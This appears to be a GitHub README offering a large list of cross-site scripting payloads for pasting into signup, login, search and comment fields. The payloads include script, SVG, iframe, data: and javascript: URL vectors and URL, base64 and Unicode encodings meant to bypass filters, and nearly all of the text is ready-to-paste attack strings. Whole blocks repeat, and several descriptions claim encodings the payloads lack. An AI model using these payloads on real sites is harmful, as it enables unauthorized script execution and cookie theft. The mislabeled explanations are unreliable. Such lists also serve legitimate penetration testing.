Welcome to the Comprehensive XSS Payloads repository! This repository contains a thorough collection of powerful XSS payloads designed to test the security of web applications across various sections such as signup, login, search, comments, and firewall bypassing. These payloads are crafted to bypass various filters and input validations, making them effective for discovering XSS vulnerabilities.
These payloads can be used to test different sections of web applications. To use a payload, simply copy it from the list below and paste it into the input field you wish to test. Observe if the payload executes, indicating an XSS vulnerability.
-
Navigate to the Target Section: Go to the relevant section of the target website, for example: https://example.com/signup https://example.com/login https://example.com/search https://example.com/comments
-
Enter the Payload: Input one of the payloads from the list into the respective input field (username, password, email, comments, etc.).
-
Submit the Form: Press enter or click the submit button to send the form.
-
Observe the Results: If the input field is vulnerable to XSS, an alert box with the specified message should appear, revealing an XSS vulnerability.
"><svg/onload=alert(1)> : SVG tag with onload event to trigger JavaScript.
"><img src=x onerror=alert(1)> : Image tag with onerror event to execute JavaScript.
"><script>alert(1)</script> : Simple script tag to execute JavaScript.
"><iframe src="javascript:alert(1)"></iframe> : Iframe tag with JavaScript source to execute alert.
"><input type="text" value="<script>alert(1)</script>"> : Input field with embedded script tag.
"><body onload=alert(1)> : Body tag with onload event to execute JavaScript.
"><img src=x onerror="this.onerror=null;alert(1)"> : Image tag with self-nullifying onerror event.
"><audio src=x onerror=alert(1)> : Audio tag with onerror event to trigger JavaScript.
"><video src=x onerror=alert(1)> : Video tag with onerror event to execute alert.
"><marquee onstart=alert(1)> : Marquee tag with onstart event to execute JavaScript.
"><object data="data:text/html,<script>alert(1)</script>"></object> : Object tag with data URL containing JavaScript.
"><embed src="data:text/html,<script>alert(1)</script>"> : Embed tag with data URL containing JavaScript.
"><form action="javascript:alert(1)"><input type="submit"></form> : Form tag with action attribute set to JavaScript.
"><link rel="stylesheet" href="javascript:alert(1)"> : Link tag with href attribute set to JavaScript.
"><svg><desc><![CDATA[</desc><script>alert(1)//]]></script> : SVG tag with CDATA section to execute JavaScript.
"><math><maction xlink:href="javascript:alert(1)">click</maction></math> : MathML tag with xlink attribute for JavaScript.
"><meta http-equiv="refresh" content="0;url=javascript:alert(1)"> : Meta tag with refresh attribute set to JavaScript.
"><input type="button" onclick=alert(1) value="Click me"> : Input button with onclick event to trigger alert.
"><textarea onfocus=alert(1) autofocus> : Textarea with onfocus event to execute JavaScript.
"><select onfocus=alert(1) autofocus><option>1</option></select> : Select element with onfocus event to execute alert.
"><svg><use xlink:href="javascript:alert(1)"></use></svg> : SVG use tag with xlink attribute set to JavaScript.
"><div style="width: expression(alert(1));"> : Div tag with CSS expression to execute JavaScript.
"><a href="javascript:alert(1)">Click me</a> : Anchor tag with href attribute set to JavaScript.
"><input type="image" src="javascript:alert(1);"> : Input image with src attribute set to JavaScript.
"><form><button formaction="javascript:alert(1)">Submit</button></form> : Form with button formaction attribute set to JavaScript.
"><img src=x onerror="alert(String.fromCharCode(88,83,83))"> : Image tag with onerror event using String.fromCharCode to execute alert.
"><iframe src="data:text/html,<script>alert(1)</script>"></iframe> : Iframe with data URL containing JavaScript.
"><script>alert(1)// : Script tag with single-line comment to break out of attributes.
"><svg/onmouseover=alert(1)> : SVG tag with onmouseover event to execute JavaScript.
"><div onclick=alert(1)>Click me</div> : Div tag with onclick event to trigger alert.
"><meta content="text/html; charset=UTF-7"><script>alert(1)</script> : Meta tag with charset attribute set to UTF-7.
"><img src=x onmouseover=alert(1)> : Image tag with onmouseover event to execute alert.
"><div style="background:url('javascript:alert(1)')"> : Div tag with CSS background URL containing JavaScript.
"><svg/onmouseenter=alert(1)> : SVG tag with onmouseenter event to execute JavaScript.
"><svg/onmouseleave=alert(1)> : SVG tag with onmouseleave event to execute JavaScript.
"><svg/onfocus=alert(1)> : SVG tag with onfocus event to execute JavaScript.
"><svg/onblur=alert(1)> : SVG tag with onblur event to execute JavaScript.
"><div id="x" style="width:100px;height:100px;" onclick="alert(1)">Click me</div> : Div tag with id, style, and onclick attributes to trigger alert.
"><div style="background:url(javascript:alert(1));"> : Div tag with CSS background URL containing JavaScript.
"><div style="width: expression(alert(1));"> : Div tag with CSS expression to execute JavaScript.
"><img src=x:alert(1) onerror=eval(src)> : Image tag with eval in onerror attribute to execute JavaScript.
"><svg><use xlink:href="javascript:alert(1)"></use></svg> : SVG use tag with xlink attribute set to JavaScript.
"><object data="data:text/html,<script>alert(1)</script>"></object> : Object tag with data URL containing JavaScript.
"><embed src="data:text/html,<script>alert(1)</script>"> : Embed tag with data URL containing JavaScript.
"><input type="text" value='1 & onmouseover="alert(1)" autofocus> : Input field with onmouseover event to execute JavaScript.
"><img src=x onerror=alert(String.fromCharCode(88,83,83))> : Image tag with onerror event using String.fromCharCode to execute alert.
"><iframe src="data:text/html,<script>alert(1)</script>"></iframe> : Iframe with data URL containing JavaScript.
"><script src="data:text/javascript,alert(1);"></script> : Script tag with data URL containing JavaScript.
\"><svg/onload=eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))> : SVG tag with onload event using hexadecimal encoding for the alert function.
%3Cimg%20src%3Dx%20onerror%3Dalert%28%27XSS%27%29%3E : Encodes the payload using URL encoding to bypass filters.
<script>alert('XSS')</script> : Uses hexadecimal encoding for characters to bypass filters.
%253Cscript%253Ealert%2528'XSS'%2529%253C/script%253E : Double encoding to further obfuscate the payload.
\"><img src=x onerror=alert('XSS')><svg/onload=alert('XSS')><script>alert('XSS')</script> : Combines multiple vectors to ensure execution in different contexts.
\"><img src=x onerror=alert(1)> : Inline event handler in HTML attributes.
\"><script>alert('XSS')</script> : Breaking out of HTML contexts.
\"><img src=x onerror=\u0061lert('XSS')> : Obfuscated JavaScript using Unicode escape sequences.
\"><script src="data:text/javascript,alert('XSS');"></script> : Script with data URL.
\"><svg><script>alert('XSS')</script></svg> : SVG with script.
\"><object data="data:text/html,<script>alert('XSS')</script>"></object> : Object data with script.
\"><embed src="data:text/html,<script>alert('XSS')</script>"></embed> : Embed data with script.
\"><input type="image" src="javascript:alert('XSS');"> : Input image with JavaScript.
\"><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> : Base64 encoded alert in iframe.
\"><math><maction xlink:href="javascript:alert('XSS')">click</maction></math> : MathML with xlink.
\"><iframe src="javascript:alert('XSS')"></iframe> : Iframe with JavaScript source.
\"><meta content="text/html; charset=UTF-7" http-equiv="Content-Type"><script>alert('XSS')</script> : Meta charset UTF-7.
\"><iframe src="data:text/html,<body onload=alert('XSS')>"></iframe> : Iframe with body onload.
\"><scr<script%20>alert('XSS') : URL-encoded space in script tag.
\"><scr\i\pt>alert(1)</scr\i\pt> : Script tag with slashes.
\"><div style="width: expression(alert('XSS'));"> : CSS expression.
\"><scr'+'ipt>alert('XSS')</scr'+'ipt> : Concatenated script tags.
\"><iframe srcdoc="<svg onload=alert('XSS')>"></iframe> : Encoded SVG onload in iframe srcdoc.
\"><img src="x <img src="x" onerror="alert('XSS')"> : Incomplete image tag followed by full tag.
\"><input type="button" onclick="alert('XSS')" value="Click me"> : Encoded parentheses in onclick.
\"><svg/onload=alert('XSS')> : Encoded parentheses in onload.
\"><body onload="javascript:alert('XSS')"> : Body onload with encoded parentheses.
\"><img src=javascript:alert('XSS')> : Encoded parentheses in img src.
\"><div style="background:url(javascript:alert('XSS'))"> : Encoded "javascript" in background URL.
\"><iframe src="javascript:alert('XSS')"></iframe> : Hexadecimal encoded "javascript" in iframe.
\"><img src=java\script:alert('XSS')> : Escaped "script" in img src.
\"><scr\ipt>alert('XSS')</scr\ipt> : Escaped script tag with encoded alert.
\"><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> : Base64 encoded alert in iframe.
\"><link rel="stylesheet" href="data:text/css,.x{background:url(javascript:alert('XSS'))}"> : CSS with JavaScript URL.
\"><form><button formaction="javascript:alert('XSS')">Submit</button></form> : Button formaction with encoded alert.
\"><input type="text" value='1 & onmouseover="alert('XSS')" autofocus> : Input with onmouseover and single quotes.
\"><img src=x onerror=alert(String.fromCharCode(88,83,83))> : onerror with String.fromCharCode.
\"><iframe src="data:text/html,<script>alert('XSS')</script>"></iframe> : Encoded alert in data URL.
\"><svg><use xlink:href="javascript:alert('XSS')"></use></svg> : SVG use with xlink and encoded alert.
\"><script src="data:text/javascript,alert('XSS')"></script> : Encoded alert in script src.
\"><body onpageshow=alert('XSS')> : Body onpageshow event.
\"><input type="image" src="javascript:alert('XSS');"> : Input image with JavaScript.
\"><a href="javas	cript:alert('XSS')">Click me</a> : Tab character in JavaScript URL.
\"><meta http-equiv="set-cookie" content="name=value; path=/; HttpOnly"><script>alert(document.cookie)</script> : HTTP-only cookie with alert.
\"><img src=x:alert(1) onerror=eval(src)> : eval with img src.
\"><iframe src="data:text/html,<div onclick=alert('XSS')>Click me</div>"></iframe> : Iframe with div onclick.
"><svg/onload=alert(1)> : SVG tag with onload event to trigger JavaScript.
"><img src=x onerror=alert(1)> : Image tag with onerror event to execute JavaScript.
"><script>alert(1)</script> : Simple script tag to execute JavaScript.
"><iframe src="javascript:alert(1)"></iframe> : Iframe tag with JavaScript source to execute alert.
"><input type="text" value="<script>alert(1)</script>"> : Input field with embedded script tag.
"><body onload=alert(1)> : Body tag with onload event to execute JavaScript.
"><img src=x onerror="this.onerror=null;alert(1)"> : Image tag with self-nullifying onerror event.
"><audio src=x onerror=alert(1)> : Audio tag with onerror event to trigger JavaScript.
"><video src=x onerror=alert(1)> : Video tag with onerror event to execute alert.
"><marquee onstart=alert(1)> : Marquee tag with onstart event to execute JavaScript.
"><object data="data:text/html,<script>alert(1)</script>"></object> : Object tag with data URL containing JavaScript.
"><embed src="data:text/html,<script>alert(1)</script>"> : Embed tag with data URL containing JavaScript.
"><form action="javascript:alert(1)"><input type="submit"></form> : Form tag with action attribute set to JavaScript.
"><link rel="stylesheet" href="javascript:alert(1)"> : Link tag with href attribute set to JavaScript.
"><svg><desc><![CDATA[</desc><script>alert(1)//]]></script> : SVG tag with CDATA section to execute JavaScript.
"><math><maction xlink:href="javascript:alert(1)">click</maction></math> : MathML tag with xlink attribute for JavaScript.
"><meta http-equiv="refresh" content="0;url=javascript:alert(1)"> : Meta tag with refresh attribute set to JavaScript.
"><input type="button" onclick=alert(1) value="Click me"> : Input button with onclick event to trigger alert.
"><textarea onfocus=alert(1) autofocus> : Textarea with onfocus event to execute JavaScript.
"><select onfocus=alert(1) autofocus><option>1</option></select> : Select element with onfocus event to execute alert.
"><svg><use xlink:href="javascript:alert(1)"></use></svg> : SVG use tag with xlink attribute set to JavaScript.
"><div style="width: expression(alert(1));"> : Div tag with CSS expression to execute JavaScript.
"><a href="javascript:alert(1)">Click me</a> : Anchor tag with href attribute set to JavaScript.
"><input type="image" src="javascript:alert(1);"> : Input image with src attribute set to JavaScript.
"><form><button formaction="javascript:alert(1)">Submit</button></form> : Form with button formaction attribute set to JavaScript.
"><img src=x onerror="alert(String.fromCharCode(88,83,83))"> : Image tag with onerror event using String.fromCharCode to execute alert.
"><iframe src="data:text/html,<script>alert(1)</script>"></iframe> : Iframe with data URL containing JavaScript.
"><script>alert(1)// : Script tag with single-line comment to break out of attributes.
"><svg/onmouseover=alert(1)> : SVG tag with onmouseover event to execute JavaScript.
"><div onclick=alert(1)>Click me</div> : Div tag with onclick event to trigger alert.
"><meta content="text/html; charset=UTF-7"><script>alert(1)</script> : Meta tag with charset attribute set to UTF-7.
"><img src=x onmouseover=alert(1)> : Image tag with onmouseover event to execute alert.
"><div style="background:url('javascript:alert(1)')"> : Div tag with CSS background URL containing JavaScript.
"><svg/onmouseenter=alert(1)> : SVG tag with onmouseenter event to execute JavaScript.
"><svg/onmouseleave=alert(1)> : SVG tag with onmouseleave event to execute JavaScript.
"><svg/onfocus=alert(1)> : SVG tag with onfocus event to execute JavaScript.
"><svg/onblur=alert(1)> : SVG tag with onblur event to execute JavaScript.
"><div id="x" style="width:100px;height:100px;" onclick="alert(1)">Click me</div> : Div tag with id, style, and onclick attributes to trigger alert.
"><div style="background:url(javascript:alert(1));"> : Div tag with CSS background URL containing JavaScript.
"><div style="width: expression(alert(1));"> : Div tag with CSS expression to execute JavaScript.
"><img src=x:alert(1) onerror=eval(src)> : Image tag with eval in onerror attribute to execute JavaScript.
"><svg><use xlink:href="javascript:alert(1)"></use></svg> : SVG use tag with xlink attribute set to JavaScript.
"><object data="data:text/html,<script>alert(1)</script>"></object> : Object tag with data URL containing JavaScript.
"><embed src="data:text/html,<script>alert(1)</script>"> : Embed tag with data URL containing JavaScript.
"><input type="text" value='1 & onmouseover="alert(1)" autofocus> : Input field with onmouseover event to execute JavaScript.
"><img src=x onerror=alert(String.fromCharCode(88,83,83))> : Image tag with onerror event using String.fromCharCode to execute alert.
"><iframe src="data:text/html,<script>alert(1)</script>"></iframe> : Iframe with data URL containing JavaScript.
"><script src="data:text/javascript,alert(1);"></script> : Script tag with data URL containing JavaScript.
"><img src=x onerror=alert(1)> : Basic payload using img onerror event.
%3Cscript%3Ealert(1)%3C%2Fscript%3E : URL-encoded script tag to bypass filters.
<script>alert(1)</script> : HTML entity encoded script tag.
%253Cscript%253Ealert(1)%253C%252Fscript%253E : Double URL-encoded script tag.
"><svg/onload=alert(1)> : SVG onload event to trigger alert.
"><iframe src="javascript:alert(1)"></iframe> : Iframe tag with JavaScript source.
"><input type="text" value="<script>alert(1)</script>"> : Input field with embedded script tag.
"><body onload=alert(1)> : Body tag with onload event to execute alert.
"><img src=x onerror="this.onerror=null;alert(1)"> : Image tag with self-nullifying onerror event.
"><audio src=x onerror=alert(1)> : Audio tag with onerror event.
"><video src=x onerror=alert(1)> : Video tag with onerror event.
"><marquee onstart=alert(1)> : Marquee tag with onstart event.
"><object data="data:text/html,<script>alert(1)</script>"></object> : Object tag with data URL.
"><embed src="data:text/html,<script>alert(1)</script>"> : Embed tag with data URL.
"><form action="javascript:alert(1)"><input type="submit"></form> : Form tag with JavaScript action.
"><link rel="stylesheet" href="javascript:alert(1)"> : Link tag with JavaScript href.
"><svg><desc><![CDATA[</desc><script>alert(1)//]]></script> : SVG tag with CDATA section.
"><math><maction xlink:href="javascript:alert(1)">click</maction></math> : MathML tag with xlink attribute.
"><meta http-equiv="refresh" content="0;url=javascript:alert(1)"> : Meta tag with refresh attribute.
"><input type="button" onclick=alert(1) value="Click me"> : Input button with onclick event.
"><textarea onfocus=alert(1) autofocus> : Textarea with onfocus event.
"><select onfocus=alert(1) autofocus><option>1</option></select> : Select element with onfocus event.
"><svg><use xlink:href="javascript:alert(1)"></use></svg> : SVG use tag with xlink attribute.
"><div style="width: expression(alert(1));"> : Div tag with CSS expression.
"><a href="javascript:alert(1)">Click me</a> : Anchor tag with JavaScript href.
"><input type="image" src="javascript:alert(1);"> : Input image with JavaScript src.
"><form><button formaction="javascript:alert(1)">Submit</button></form> : Form with button formaction.
"><img src=x onerror="alert(String.fromCharCode(88,83,83))"> : Image tag with String.fromCharCode.
"><iframe src="data:text/html,<script>alert(1)</script>"></iframe> : Iframe with data URL.
"><script>alert(1)// : Script tag with single-line comment.
"><svg/onmouseover=alert(1)> : SVG tag with onmouseover event.
"><div onclick=alert(1)>Click me</div> : Div tag with onclick event.
"><meta content="text/html; charset=UTF-7"><script>alert(1)</script> : Meta tag with charset UTF-7.
"><img src=x onmouseover=alert(1)> : Image tag with onmouseover event.
"><div style="background:url('javascript:alert(1)')"> : Div tag with JavaScript background URL.
"><svg/onmouseenter=alert(1)> : SVG tag with onmouseenter event.
"><svg/onmouseleave=alert(1)> : SVG tag with onmouseleave event.
"><svg/onfocus=alert(1)> : SVG tag with onfocus event.
"><svg/onblur=alert(1)> : SVG tag with onblur event.
"><div id="x" style="width:100px;height:100px;" onclick="alert(1)">Click me</div> : Div tag with onclick event.
"><div style="background:url(javascript:alert(1));"> : Div tag with JavaScript background URL.
"><div style="width: expression(alert(1));"> : Div tag with CSS expression.
"><img src=x:alert(1) onerror=eval(src)> : Image tag with eval in onerror.
"><svg><use xlink:href="javascript:alert(1)"></use></svg> : SVG use tag with xlink attribute.
"><object data="data:text/html,<script>alert(1)</script>"></object> : Object tag with data URL.
"><embed src="data:text/html,<script>alert(1)</script>"> : Embed tag with data URL.
"><input type="text" value='1 & onmouseover="alert(1)" autofocus> : Input field with onmouseover event.
"><img src=x onerror=alert(String.fromCharCode(88,83,83))> : Image tag with String.fromCharCode.
"><iframe src="data:text/html,<script>alert(1)</script>"></iframe> : Iframe with data URL.
"><script src="data:text/javascript,alert(1);"></script> : Script tag with data URL.
<svg/onload=alert(1)// : SVG tag with onload event and comment.
<img src=x onerror=alert('XSS')> : Image tag with onerror event for XSS.
"><script>document.write('<img src=x onerror=alert(1)>')</script> : Script tag writing an image tag.
"><script>document.body.innerHTML='<img src=x onerror=alert(1)>'</script> : Script tag modifying the body HTML.
<img src=x onerror="window.onerror=null;alert(1)"> : Image tag with self-nullifying onerror event.
"><iframe srcdoc="<svg/onload=alert(1)>"></iframe> : Iframe with srcdoc containing SVG onload.
"><meta charset="x-user-defined"><script>alert(String.fromCharCode(88,83,83))</script> : Meta tag with user-defined charset.
"><svg xmlns:xlink="http://www.w3.org/1999/xlink"><script xlink:href="data:text/javascript,alert(1)"></script></svg> : SVG tag with xlink and data URL.
"><style>@import 'javascript:alert(1)';</style> : Style tag importing JavaScript.
"><meta http-equiv="refresh" content="0;url=data:text/html,<script>alert(1)</script>"> : Meta tag with refresh attribute and data URL.
"><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> : Iframe with base64 encoded script.
"><iframe src="data:text/html,<body onload=alert(1)></iframe> : Iframe with body onload event.
"><meta http-equiv="refresh" content="0;url=javascript:alert(1)"> : Meta tag with refresh attribute set to JavaScript.
"><input type="button" onclick=alert(1) value="Click me"> : Input button with onclick event to trigger alert.
"><textarea onfocus=alert(1) autofocus> : Textarea with onfocus event.
I welcome contributions to this repository! If you have additional payloads or improvements, please submit a pull request. Ensure your contributions adhere to ethical guidelines and responsible disclosure practices.